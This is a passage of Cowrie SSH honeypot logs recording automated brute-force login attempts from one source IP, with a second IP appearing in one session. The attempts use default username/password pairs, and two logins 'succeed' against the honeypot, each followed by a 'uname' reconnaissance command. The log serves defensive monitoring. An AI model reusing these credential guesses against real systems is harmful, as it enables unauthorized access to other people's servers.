sh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:30.032645Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:52:30.172523Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:52:30.333744Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:52:30.334606Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:30.381543Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:30.382636Z","src_ip":"212.227.125.160","session":"d766076e2b41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50076,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0cdbc6e5434","protocol":"ssh","message":"New connection: 212.227.125.160:50076 (1.2.3.4:22) [session: a0cdbc6e5434]","sensor":"my-vps","timestamp":"2025-08-26T21:52:35.587623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:35.599607Z","src_ip":"212.227.125.160","session":"a0cdbc6e5434"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:35.635957Z","src_ip":"212.227.125.160","session":"a0cdbc6e5434"}
{"eventid":"cowrie.login.failed","username":"alexis","password":"alexis","message":"login attempt [alexis/alexis] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:35.820271Z","src_ip":"212.227.125.160","session":"a0cdbc6e5434"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:36.877210Z","src_ip":"212.227.125.160","session":"a0cdbc6e5434"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45464,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a79f3fd0196","protocol":"ssh","message":"New connection: 212.227.125.160:45464 (1.2.3.4:22) [session: 2a79f3fd0196]","sensor":"my-vps","timestamp":"2025-08-26T21:52:40.553084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:40.554594Z","src_ip":"212.227.125.160","session":"2a79f3fd0196"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:40.619053Z","src_ip":"212.227.125.160","session":"2a79f3fd0196"}
{"eventid":"cowrie.login.failed","username":"sem5","password":"sem5","message":"login attempt [sem5/sem5] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:41.305351Z","src_ip":"212.227.125.160","session":"2a79f3fd0196"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:42.366910Z","src_ip":"212.227.125.160","session":"2a79f3fd0196"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40850,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fcd4c32fe7c","protocol":"ssh","message":"New connection: 212.227.125.160:40850 (1.2.3.4:22) [session: 6fcd4c32fe7c]","sensor":"my-vps","timestamp":"2025-08-26T21:52:46.395830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:46.396761Z","src_ip":"212.227.125.160","session":"6fcd4c32fe7c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:46.445830Z","src_ip":"212.227.125.160","session":"6fcd4c32fe7c"}
{"eventid":"cowrie.login.failed","username":"user2","password":"user2","message":"login attempt [user2/user2] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:46.624966Z","src_ip":"212.227.125.160","session":"6fcd4c32fe7c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:47.831402Z","src_ip":"212.227.125.160","session":"6fcd4c32fe7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36242,"dst_ip":"1.2.3.4","dst_port":22,"session":"642167d71f6d","protocol":"ssh","message":"New connection: 212.227.125.160:36242 (1.2.3.4:22) [session: 642167d71f6d]","sensor":"my-vps","timestamp":"2025-08-26T21:52:52.061756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:52.063638Z","src_ip":"212.227.125.160","session":"642167d71f6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:52.114852Z","src_ip":"212.227.125.160","session":"642167d71f6d"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"minecraft","message":"login attempt [minecraft/minecraft] failed","sensor":"my-vps","timestamp":"2025-08-26T21:52:52.325473Z","src_ip":"212.227.125.160","session":"642167d71f6d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:53.382487Z","src_ip":"212.227.125.160","session":"642167d71f6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59858,"dst_ip":"1.2.3.4","dst_port":22,"session":"f66501b29405","protocol":"ssh","message":"New connection: 212.227.125.160:59858 (1.2.3.4:22) [session: f66501b29405]","sensor":"my-vps","timestamp":"2025-08-26T21:52:57.614473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:52:57.621969Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:52:57.668643Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:52:57.840175Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:52:57.989095Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:52:57.989748Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:58.035557Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:52:58.036565Z","src_ip":"212.227.125.160","session":"f66501b29405"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55244,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba643128747e","protocol":"ssh","message":"New connection: 212.227.125.160:55244 (1.2.3.4:22) [session: ba643128747e]","sensor":"my-vps","timestamp":"2025-08-26T21:53:03.074734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:03.076131Z","src_ip":"212.227.125.160","session":"ba643128747e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:03.119787Z","src_ip":"212.227.125.160","session":"ba643128747e"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:03.674416Z","src_ip":"212.227.125.160","session":"ba643128747e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:04.723292Z","src_ip":"212.227.125.160","session":"ba643128747e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50630,"dst_ip":"1.2.3.4","dst_port":22,"session":"10369bb2b73d","protocol":"ssh","message":"New connection: 212.227.125.160:50630 (1.2.3.4:22) [session: 10369bb2b73d]","sensor":"my-vps","timestamp":"2025-08-26T21:53:08.735738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:08.737195Z","src_ip":"212.227.125.160","session":"10369bb2b73d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:08.781756Z","src_ip":"212.227.125.160","session":"10369bb2b73d"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:08.967549Z","src_ip":"212.227.125.160","session":"10369bb2b73d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:10.019048Z","src_ip":"212.227.125.160","session":"10369bb2b73d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51274,"dst_ip":"1.2.3.4","dst_port":22,"session":"450b20bfc0b2","protocol":"ssh","message":"New connection: 212.227.235.229:51274 (1.2.3.4:22) [session: 450b20bfc0b2]","sensor":"my-vps","timestamp":"2025-08-26T21:53:12.900488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:13.703963Z","src_ip":"212.227.235.229","session":"450b20bfc0b2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:53:13.726093Z","src_ip":"212.227.235.229","session":"450b20bfc0b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46022,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eee58b031e2","protocol":"ssh","message":"New connection: 212.227.125.160:46022 (1.2.3.4:22) [session: 2eee58b031e2]","sensor":"my-vps","timestamp":"2025-08-26T21:53:14.821995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:14.831353Z","src_ip":"212.227.125.160","session":"2eee58b031e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:14.889174Z","src_ip":"212.227.125.160","session":"2eee58b031e2"}
{"eventid":"cowrie.login.failed","username":"cephadm","password":"cephadm","message":"login attempt [cephadm/cephadm] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:15.099428Z","src_ip":"212.227.125.160","session":"2eee58b031e2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:16.146096Z","src_ip":"212.227.125.160","session":"2eee58b031e2"}
